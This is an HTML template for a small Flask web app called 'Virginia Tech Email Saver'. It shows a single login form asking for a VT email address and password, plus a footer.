<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Virginia Tech Email Saver</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='css/styles.css') }}">
    <script type="module" src="{{ url_for('static', filename='js/animations.js') }}"></script>
</head>
<body>
    <div class="container">
        <!-- Form Container -->
        <div id="form-container">
            <h1>Virginia Tech Email Saver</h1>
            <form id="credentials-form">
                <label for="vt_email">VT Email:</label>
                <input type="email" id="vt_email" name="vt_email" required autocomplete="email">
                <label for="vt_password">Password:</label>
                <input type="password" id="vt_password" name="vt_password" required autocomplete="current-password">
                <button type="submit">Submit</button>
            </form>
        </div>
    </div>

    <footer>
        <p>&copy; 2025 Virginia Tech Email Saver</p>
    </footer>
</body>
</html>
